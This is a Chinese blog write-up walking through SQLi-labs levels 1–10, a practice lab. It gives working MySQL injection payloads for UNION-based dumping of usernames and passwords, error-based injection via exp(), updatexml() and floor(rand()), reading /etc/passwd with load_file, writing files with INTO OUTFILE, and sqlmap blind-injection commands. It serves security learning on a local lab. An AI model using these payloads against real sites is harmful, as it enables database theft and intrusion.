SQLlabs 通关笔记
mysql数据结构
在练习靶场前我们需要了解以下mysql数据库结构,mysql数据库5.0以上版本有一个自带的数据库叫做information_schema
,该数据库下面有两个表一个是tables
和columns
。tables
这个表的table_name
字段下面是所有数据库存在的表名。table_schema
字段下是所有表名对应的数据库名。columns
这个表的colum_name
字段下是所有数据库存在的字段名。columns_schema
字段下是所有表名对应的数据库。了解这些对于我们之后去查询数据有很大帮助。我们前面机关讲解比较详细后面就比较简单了。 这个是我第一次做sql的时候看到那些payload的时候很不懂的一个东西,后来才知道是MySQL里面自带的。
less 1~4
这一题比较常规直接给出payload,只是每个的闭合点或者传参方式有点不一样
//找列数
?id=1' order by 3#
?id=1' order by 4#
//确定哪个字段有回现
?id=0' union select 1,2,3#//令id=0是因为数据库有1这个id,而它的回显位置有限,不会将所有查询的东西返回出来,只能取有的第一行数据
//爆出当前数据库
?id=0' union select 1,2,database()#
//爆出当前数据库的表名
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
//爆出当前表的列名
?id=0' union select 1,2,group_concat(COLUMN_name) from information_schema.COLUMNS where table_name='users'#
//爆出当数据库的user表所有的passwd和username
?id=0' union select 1,group_concat(username),group_concat(password) from users#
less 5、6
这里就没有回显了,但是还是会有报错这个时候可以使用报错注入
报错注入
什么是报错注入
报错注入是通过特殊函数错误使用并使其输出结果来获取信息的。简单点来说,就是在可以进行sql注入的位置,调用特殊的函数执行,利用函数报错使其输出结果来获取数据库的相关信息
使用条件
页面错误信息显示出来
种类
BigInt等数据类型溢出
函数参数格式错误
主键、字段重复
报错函数
BigInt函数数据类型溢出报错注入
mysql数据库版本为:?id=1' and exp(~(select * from (select user())a))--+
exp(int)函数利用是BigInt数据类型溢出
作用:返回e的x次方,当x的值足够大的时候就会导致函数的结果数据类型溢出
利用方式:当涉及到注入时,我们使用否定查询来造成“DOUBLE value is out of range”,因为函数成功执行时,会返回0,那么我们先将0按位取反,在获取e的那个数的次方,就会造成BigInt数据类型溢出,就会报错
payload:?id=1' and exp(~(select * from (select user())a))#
语意:先查询select user()这个语句的结果,然后将查询出来的数据作为一个结果集取名为a,再查询a,将结果a全部查出来
and exp(~(select * from (select table_name from information_schema.tables where table_schema=database() limit 0,1)a))#表名
and exp(~(select * from (select column_name from information_schema.columns where table_name='users' limit 0,1)a))#列名
and exp(~(select * from (select column_name from information_schema.columns where table_name='users' limit 0,1)a))#列名里面的信息
and exp(~(select * from (select load_file('/etc/passwd'))a))#读取文件
注意:对于所有的insert、update和delete语句DIOS查询也同样可以使用 除了exp()函数之外,pow()之类的相似函数同样可以利用BigInt数据溢出的方式进行报错注入
参数格式错误进行报错注入
updataxml
函数利用的就是mysql函数参数格式错误进行报错注入
语法:updataxml(XML_document,Xpath_string,new_value);
语法解析:
XML_document:是字符串String格式,为XML文档对象名称
Xpath_string:Xpath格式的字符串
new_value:string格式,替换查找到的符合条件的数据
适用版本:5.1.5+
利用方式:在执行两个函数时,如果出现xml文件路径错误,就会产生报错,那么我们就需要构造Xpath_tring
格式错误,就是我们将Xpath_string
的值传递成不符合格式的参数,mysql就会报错
payload:
?id=1' and updatexml(1,concat(0x7e,user(),0x7e,version(),0x7e),3)--+#查询当前数据库用户信息以及数据库版本信息
?id=1' and updatexml(1,concat(0x7e,database(),0x7e,@@version_compile_os,0x7e),3)--+#查询当前数据库名称和操作系统版本信息
?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),3)--+#获取当前数据库下数据表的信息
注意:在使用updatexml()函数造成xpath格式不符报错注入的时候,需要注意: updatexml最多只能显示32位,需要配合SUBSTR使用
主键重复
这种方式可以实现报错的原因:虚拟表的主键重复
首先,主键重复方式的报错注入利用的函数有:floor() + rand() + group() + count()
floor()
函数的作用就是返回小于等于该值的最大整数,即向下取整,只保留整数部分;count()
函数是一个计数函数 group by 语句与count()函数结合,根据一个或多个列对结果集进行分组;rand()
函数用来随机生成0或1,在sql报错注入中,我们使用rand(0)获取有规律可循的0或1随机数字(rand()生成的数字是完全随机的)
原理:在使用group by进行分组查询的时候,数据库会生成一张虚拟表,并使用group by还要进行两次运算,第一次运算是先获取group by后面的值,然后拿group by后面的值去和虚拟表中的值比较;第二次是对比虚拟表中的值如果group by后面的值在虚拟表中不存在,那么就将group by后面的值插入到虚拟表中,当插入虚拟表中时,进行运算。那么,rand()函数存在一定的随机性,所以group by后面的值两次计算结果可能不一致,但是这个运算的结果可能在虚拟表中已经存在了,那么这时候吧值插入到虚拟表中就会导致主键重复,进而引发错误!!来实现我们想要的效果
payload:
and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
less 7-10
盲注
延时盲注
sqlmap -u "http://127.0.0.1:8888/Less-7/?id=1" --dbms=MySQL --random-agent --flush-session --technique=T -v 3
布尔盲注
sqlmap -u "http://127.0.0.1:8888/Less-7/?id=1" --dbms=MySQL --random-agent --flush-session --technique=B -v 3
导出数据到文件
使用 outfile 导出到文件来查询数据,默认 outfile 是没有开启的,得手动开启一下
# mysql -e "show global variables like '%secure%';"
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_auth | OFF |
| secure_file_priv | |
+------------------+-------+
- ure_file_priv 的值为
null
,表示限制 mysqld 不允许导入 | 导出 - 当 secure_file_priv 的值为
/tmp/
,表示限制 mysqld 的导入 | 导出只能发生在 /tmp/ 目录下 - 当 secure_file_priv 的值为
空
时,表示不对 mysqld 的导入 | 导出做限制
payload:/?id=1')) union select * from security.users into outfile "D://phpstudy_pro/WWW/sqllabs/Less-7/1.txt"#
标签:10,group,SQLlabs,数据库,less1,报错,id,select,schema
From: https://www.cnblogs.com/Belik0e/p/17293971.html